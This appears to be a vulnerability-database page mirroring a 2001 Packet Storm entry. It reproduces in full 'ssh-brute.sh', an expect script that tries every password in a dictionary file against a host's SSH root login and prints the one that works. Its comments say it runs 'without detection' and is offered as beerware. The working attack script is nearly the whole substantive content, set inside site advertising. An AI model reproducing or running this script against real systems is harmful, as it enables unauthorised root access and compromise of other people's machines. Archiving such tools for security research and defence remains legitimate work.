Lucene search

ssh-brute.sh

🗓️ 09 Mar 2001 00:00:00Reported by crimelabs.netType

packetstorm🔗 packetstormsecurity.com👁 17 Views

Brute force script to crack SSH root password using a custom dictionary for exploitation.

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`#!/usr/bin/expect -f  
#  
# simple expect exploit to brute force root's password via ssh without  
# detection.. see CLABS200101 for info on this exploit.  
#  
# this is beerware, just buy me a beer at defcon if you like this.  
# build your own dictionary, use at your own risk, no warranty, etc.  
#  
# [email protected] january, 2001  
#  
set timeout 3  
set target [lindex $argv 0]  
set dictionary [lindex $argv 1]  
  
if {[llength $argv] != 2} {  
puts stderr "Usage: $argv0 root@target dictionary\n"  
exit }  
  
set tryPass [open $dictionary r]  
  
foreach passwd [split [read $tryPass] "\n"] {  
spawn ssh $target  
expect ":"  
send "$passwd\n"  
expect "#" { puts "password is $passwd\n" ; exit }  
set id [exp_pid]  
exec kill -INT $id  
}  
# www.hack.co.za [2 March 2001]`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

09 Mar 2001 00:00Current